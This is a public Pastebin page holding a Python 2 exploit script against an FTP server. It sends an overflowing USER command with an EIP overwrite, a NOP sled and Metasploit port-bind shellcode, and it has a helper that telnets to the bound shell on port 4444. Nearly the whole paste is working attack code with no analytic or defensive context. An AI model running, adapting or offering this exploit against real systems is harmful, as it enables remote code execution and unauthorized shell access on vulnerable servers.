My Pastes
Public Pastes
Layout Width
Share Pastebin
Guest
Public paste!

Untitled

By: a guest | Mar 20th, 2010 | Syntax: Python | Size: 2.32 KB | Hits: 73 | Expires: Never
Download | Raw | Embed | Report abuse
Copy text to clipboard
  1. import os
  2. import sys
  3. import time
  4. import socket
  5. import struct
  6.  
  7. # alphanumeric portbind shellcode from metasploit
  8. shellcode=("\xd9\xcc\xd9\x74\x24\xf4\xbe\xad\xc6\xaf\xd3\x5a\x31\xc9\xb1"
  9. "\x46\x31\x72\x17\x83\xea\xfc\x03\xdf\xd5\x4d\x26\xe3\x32\x18"
  10. "\xc9\x1b\xc3\x7b\x43\xfe\xf2\xa9\x37\x8b\xa7\x7d\x33\xd9\x4b"
  11. "\xf5\x11\xc9\xd8\x7b\xbe\xfe\x69\x31\x98\x31\x69\xf7\x24\x9d"
  12. "\xa9\x99\xd8\xdf\xfd\x79\xe0\x10\xf0\x78\x25\x4c\xfb\x29\xfe"
  13. "\x1b\xae\xdd\x8b\x59\x73\xdf\x5b\xd6\xcb\xa7\xde\x28\xbf\x1d"
  14. "\xe0\x78\x10\x29\xaa\x60\x1a\x75\x0b\x91\xcf\x65\x77\xd8\x64"
  15. "\x5d\x03\xdb\xac\xaf\xec\xea\x90\x7c\xd3\xc3\x1c\x7c\x13\xe3"
  16. "\xfe\x0b\x6f\x10\x82\x0b\xb4\x6b\x58\x99\x29\xcb\x2b\x39\x8a"
  17. "\xea\xf8\xdc\x59\xe0\xb5\xab\x06\xe4\x48\x7f\x3d\x10\xc0\x7e"
  18. "\x92\x91\x92\xa4\x36\xfa\x41\xc4\x6f\xa6\x24\xf9\x70\x0e\x98"
  19. "\x5f\xfa\xbc\xcd\xe6\xa1\xaa\x10\x6a\xdc\x93\x13\x74\xdf\xb3"
  20. "\x7b\x45\x54\x5c\xfb\x5a\xbf\x19\xf3\x10\xe2\x0b\x9c\xfc\x76"
  21. "\x0e\xc1\xfe\xac\x4c\xfc\x7c\x45\x2c\xfb\x9d\x2c\x29\x47\x1a"
  22. "\xdc\x43\xd8\xcf\xe2\xf0\xd9\xc5\x80\x9b\x41\xc8\x23\x1b\xef"
  23. "\x34\x83\xb8\xcf\x5a\xbe\x4a\x30\xd6\x33\xd7\x42\x38\xc4\x65"
  24. "\xd6\x5d\x46\xe8\x38\xee\xf4\x9f\x5d\x6c\x98\x7f\xb1\x31\x1e"
  25. "\x3b\xed\x97\xb8\xe3\x83\xb2\xb0\xc3\x37\x52\x5a\x62\xa4\xcb"
  26. "\xee\x0b\x41\x64\x2f\x92\xcd\xe9\x46\x7a\x67\x81\xec\xf0\x16"
  27. "\x11\x62\x86\xab\xf9\x0c\x14\x39\x9f\x8e\xb9\xe1\x70\x0e\x7d"
  28. "\xa6\x8e\x9a")
  29.  
  30. def ConnectRemoteShell(target):
  31.        connect = "/usr/bin/telnet " + target + " 4444"
  32.        os.system(connect)
  33.  
  34. def ExploitFTP(target):
  35.        sockAddr = (target, 21)
  36.        tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  37.        tsock.connect(sockAddr)
  38.        response = tsock.recv(1024)
  39.  
  40.        # At the time of overflow EBP points to our shellcode
  41.        payload = "USER "
  42.        payload += "A" * 485
  43.        # Point of EIP overwrite. Address of 'call ebp' from user32.dll SP4.
  44.        payload += struct.pack("<L",0x7C874413 )
  45.        payload += "\x90" * 100
  46.        payload += shellcode
  47.        payload += "\r\n"
  48.        tsock.send(payload)
  49.  
  50. if __name__ == '__main__':
  51.        try:
  52.                target = sys.argv[1]
  53.        except IndexError:
  54.                print 'Usage: %s <target>' % sys.argv[0]
  55.                sys.exit(-1)
  56.  
  57.        ExploitFTP(target)
  58.        time.sleep(2)
  59. #      ConnectRemoteShell(target)
create new paste | create new version of this paste RAW Paste Data